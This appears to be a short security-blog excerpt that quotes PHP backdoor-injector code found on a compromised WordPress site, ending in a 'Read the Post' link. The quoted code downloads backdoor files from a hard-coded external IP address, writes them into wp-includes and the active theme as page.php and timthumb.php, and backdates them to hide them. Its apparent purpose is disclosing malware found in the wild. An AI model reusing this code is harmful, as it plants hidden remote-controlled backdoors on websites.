Backdoor Injector code

A backdoor injector code we found on a compromised site: if(is__writable($dir.”/wp-includes/”)): file_put_contentz($dir.’/wp-includes/page.php’, get_contentz(‘http://67.211.195.81/backdoorz/page.php’)); touch($dir.’/wp-includes/page.php’, $time); die(“;;/wp-includes/page.php;;true_upload”); endif; if(is__writable($dir.”/wp-content/themes/”.get_settings(‘template’).”/”)){ file_put_contentz($dir.’/wp-content/themes/’.get_settings(‘template’).’/timthumb.php’, get_contentz(‘http://67.211.195.81/backdoorz/timthumb.php’)); touch($dir.’/wp-content/themes/’.get_settings(‘template’).’/timthumb.php’, $time); die(“;;/wp-content/themes/”.get_settings(‘template’).”/timthumb.php;;true_upload”); } if(is__writable($dir.”/wp-admin/”)):…
Read the Post